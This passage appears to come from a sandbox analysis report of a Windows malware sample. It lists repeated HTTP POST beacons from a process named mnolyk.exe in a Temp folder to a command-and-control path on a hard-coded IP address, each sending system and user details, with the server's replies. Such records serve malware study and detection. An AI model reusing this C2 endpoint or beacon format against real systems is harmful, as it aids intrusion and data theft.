                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:32:51.115572929 CET526INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:32:51 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    327192.168.2.35002962.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:32:51.298222065 CET527OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:32:51.365262985 CET527INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:32:51 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    328192.168.2.35003062.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:32:51.734575033 CET528OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:32:51.800061941 CET528INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:32:51 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    329192.168.2.35003162.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:32:52.026036024 CET529OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:32:52.123317957 CET529INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:32:52 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    33192.168.2.34973562.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:31:24.825436115 CET234OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:31:24.888216972 CET234INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:31:24 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    330192.168.2.35003262.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:32:52.345278025 CET530OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:32:52.410057068 CET530INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:32:52 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    331192.168.2.35003362.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:32:52.676521063 CET531OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:32:52.740345955 CET531INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:32:52 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    332192.168.2.35003462.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:32:53.871279955 CET532OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:32:53.936458111 CET532INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:32:53 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    333192.168.2.35003662.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:32:58.338478088 CET533OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:32:58.404299974 CET534INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:32:58 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    334192.168.2.35003762.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:32:58.577469110 CET534OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:32:58.642394066 CET535INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:32:58 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    335192.168.2.35003862.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:32:58.827244997 CET535OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:32:58.893783092 CET536INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:32:58 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    336192.168.2.35003962.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:32:59.074009895 CET536OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:32:59.139018059 CET537INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:32:59 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    337192.168.2.35004062.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:32:59.306914091 CET537OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:32:59.370630026 CET538INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:32:59 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    338192.168.2.35004162.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:32:59.543687105 CET538OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:32:59.609154940 CET539INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:32:59 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    339192.168.2.35004262.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:32:59.788041115 CET539OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:32:59.851001978 CET539INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:32:59 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    34192.168.2.34973662.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:31:25.096772909 CET235OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:31:25.163085938 CET235INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:31:25 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    340192.168.2.35004362.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:33:00.026149035 CET540OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:33:00.090549946 CET540INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:33:00 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    341192.168.2.35004462.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:33:00.262908936 CET541OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:33:00.326045036 CET541INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:33:00 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    342192.168.2.35004562.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:33:00.500794888 CET542OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:33:00.566679001 CET542INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:33:00 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    343192.168.2.35004662.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:33:00.777060986 CET543OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:33:00.848515034 CET543INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:33:00 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    344192.168.2.35004762.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
